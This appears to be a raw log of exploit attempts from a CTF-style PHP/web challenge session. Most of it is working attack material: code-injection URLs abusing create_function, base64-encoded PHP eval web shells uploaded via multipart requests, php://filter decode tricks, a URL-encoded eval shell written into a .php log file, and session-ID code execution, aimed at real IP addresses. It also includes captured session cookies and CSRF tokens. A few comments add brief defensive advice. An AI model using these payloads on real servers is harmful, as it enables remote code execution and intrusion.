view-source:http://51.158.75.42:8087/?action=\create_function&arg=};var_dump(glob(%22../*%22));function%20a(){
>>> "<?php @eval($_GET['c']);var_dump(1);?>".encode("base64")
'PD9waHAgQGV2YWwoJF9HRVRbJ2MnXSk7dmFyX2R1bXAoMSk7Pz4=\n'
>>>
POST /index.php HTTP/1.1
Host: 127.0.0.1:9090
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.1
Content-Length: 192
Content-Type: multipart/form-data; boundary=ac98ccfcbed08b2291999b0ff480d138
--ac98ccfcbed08b2291999b0ff480d138
Content-Disposition: form-data; name="file"; filename="file"
PD9waHAgQGV2YWwoJF9HRVRbJ2MnXSk7dmFyX2R1bXAoMSk7Pz4=
--ac98ccfcbed08b2291999b0ff480d138--
POST /index.php HTTP/1.1
Host: 127.0.0.1:9090
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.1
Content-Length: 205
Content-Type: multipart/form-data; boundary=ac98ccfcbed08b2291999b0ff480d138
--ac98ccfcbed08b2291999b0ff480d138
Content-Disposition: form-data; name="file"; filename="file"
<?=
include "php://filter/convert.base64-decode/resource=1.php";
--ac98ccfcbed08b2291999b0ff480d138--
view-source:http://51.158.75.42:8088/data/04445c51df9a9db8c23eab9e201887cf/9.php?c=var_dump(glob(%22../*%22));
???
<script language="php">
eval($_POST[only]);
</script>
POST /index.php HTTP/1.1
Host: 123.207.40.26:60000
Content-Length: 105
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1:9090/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7
Cookie: indent_type=space; space_units=4; keymap=sublime; csrftoken=9Ky4QNPtX829j5rQWdDVHhDwVLTO4XUQkS7nHpl4wAZXrnvB7DhwBcGJjPrB8HEi; sessionid=3abaex90lt9kmrhn0fkyhv95wypznisd
Connection: close
domain=%3c%3f%70%68%70%0a%65%76%61%6c%28%24%5f%47%45%54%5b%63%5d%29%3b%64%69%65%28%29%3b%3f%3e&log=.php/.
// streams.c 1738
// Advances p from the start of path while the current character is
// alphanumeric, '+', '-' or '.', incrementing n once per accepted character.
// NOTE(review): presumably this is the scheme scan that precedes the "://"
// check in PHP's stream-wrapper lookup, with n as the candidate scheme
// length; confirm against the PHP source at the cited line.
// Defensive takeaway: a path built by concatenating request-controlled
// strings can begin with a wrapper scheme, so validate the complete path
// against an allow-list before it reaches any file function.
for (p = path; isalnum((int)*p) || *p == '+' || *p == '-' || *p == '.'; p++) {
n++;
}
POST http://php/index.php HTTP/1.1
Host: 127.0.0.1:60000
Content-Length: 114
Cache-Control: max-age=0
Origin: http://127.0.0.1:60000
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1:60000/
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7
Cookie: indent_type=space; space_units=4; keymap=sublime; csrftoken=9Ky4QNPtX829j5rQWdDVHhDwVLTO4XUQkS7nHpl4wAZXrnvB7DhwBcGJjPrB8HEi; sessionid=gAN9cQAu:1gQKO1:nz0EZkHVizd7Wbp0FMJt-DDiF9o
Connection: close
domain=PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2MnXSk7Pz4.com.&log=://filter/write=convert.base64-decode/resource=index.php/.
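$_SERVER['SERVER_NAME'] 可以伪造 ($_SERVER['SERVER_NAME'] can be forged by the client. Depending on the web server configuration, it is taken from request data such as the Host header or, as the preceding request suggests, an absolute request URI. Treat it as untrusted input: pin the server name in the web server configuration or check it against an allow-list of expected hostnames, and never build file paths or stream URLs from it.)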
GET /?code=var_dump(hex2bin(session_id(session_start()))); HTTP/1.1
Host: 51.158.75.42:8084
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7
Cookie: PHPSESSID=7661725f64756d7028676c6f6228222e2e2f2a2229293b
Connection: close
My name is {'wsgi.errors': <gunicorn.http.wsgi.WSGIErrorsWrapper object at 0xffff9adc7e80>, 'wsgi.version': (1, 0), 'wsgi.multithread': True, 'wsgi.multiprocess': True, 'wsgi.run_once': False, 'wsgi.file_wrapper': <class 'gunicorn.http.wsgi.FileWrapper'>, 'SERVER_SOFTWARE': 'gunicorn/19.9.0', 'wsgi.input': <gunicorn.http.body.Body object at 0xffff9ad82e10>, 'gunicorn.socket': <gevent._socket3.socket object, fd=11, family=2, type=1, proto=6>, 'REQUEST_METHOD': 'GET', 'QUERY_STRING': '', 'RAW_URI': '/', 'SERVER_PROTOCOL': 'HTTP/1.0', 'HTTP_HOST': '51.158.73.123', 'HTTP_X_FORWARDED_PROTO': 'http', 'HTTP_X_FORWARDED_FOR': '219.217.246.194', 'HTTP_CONNECTION': 'close', 'HTTP_CACHE_CONTROL': 'max-age=0', 'HTTP_UPGRADE_INSECURE_REQUESTS': '1', 'HTTP_DNT': '1', 'HTTP_USER_AGENT': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'HTTP_ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'HTTP_REFERER': 'http://51.158.73.123:8083/login/?next=/', 'HTTP_ACCEPT_ENCODING': 'gzip, deflate', 'HTTP_ACCEPT_LANGUAGE': 'zh,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7', 'HTTP_COOKIE': 'thejs.session=s%3AWdR8Pze5g-A8pPL9M1i07I_2s0DnbTDz.oG7bVoS265hR8KzjDZNPHW3ms3cukA7aJiwjhnl41bo; csrftoken=kiKTZQl4VO9vf0yzf1vd0V2SdJmweyzwSaPTCYN7MP6MP1hX85Zg33YVuNKi9clQ; sessionid=.eJxVjLEOgjAUAIuomzHxK3BpoA2ls7v728h7tAhq2pTS0cRPFxMW1rvLffNPYAWcGGMtpnloU7RTO5qQQbYwHXZw2TrC7mWdCTlcF2Ge6B6ed97N00j8n_G1iPzujX3f1n4P5-1owDiEAxQLJUEVyVISqdpSXwmpS1RCV6W0TaOxFrKvlerCMfEfqC00ww:1gQKej:eEilnTramvvogvoJ9kh5gRGZyAc', 'wsgi.url_scheme': 'http', 'REMOTE_ADDR': '172.27.0.3', 'REMOTE_PORT': '53870', 'SERVER_NAME': '0.0.0.0', 'SERVER_PORT': '8000', 'PATH_INFO': '/', 'SCRIPT_NAME': '', 'CSRF_COOKIE': 'kiKTZQl4VO9vf0yzf1vd0V2SdJmweyzwSaPTCYN7MP6MP1hX85Zg33YVuNKi9clQ'}
➜ ~ curl -X POST 'http://51.158.73.123:8080/server/editor?action=Catchimage' -d 'source[]=http://img.baidu.com/img/logo-zhidao.gif'
{"state":"SUCCESS","list":[{"url":"\/upload\/image\/b6b51ff26899674cb3aa3fb57783e4dd\/201811\/24\/50aaff118c62275ad57a.gif","source":"http:\/\/img.baidu.com\/img\/logo-zhidao.gif","state":"SUCCESS"}]}
http://51.158.73.123:8080/server/editor?action=Catchimage
➜ Desktop cat 50aaff118c62275ad57a.gif | curl -F 'upfile=@-' "http://51.158.73.123:8080/server/editor?action=UploadImage"
{"state":"SUCCESS","url":"\/upload\/image\/b6b51ff26899674cb3aa3fb57783e4dd\/201811\/24\/4003f3ad55c4a759f0bd.gif","title":"-","original":"-"}%
➜ Desktop cat index.php | curl -F 'upfile=@-' "http://51.158.73.123:8080/server/editor?action=UploadImage"
{"upfile":["The upfile must be an image.","The upfile must be a file of type: png, jpg, jpeg, gif, bmp."]}%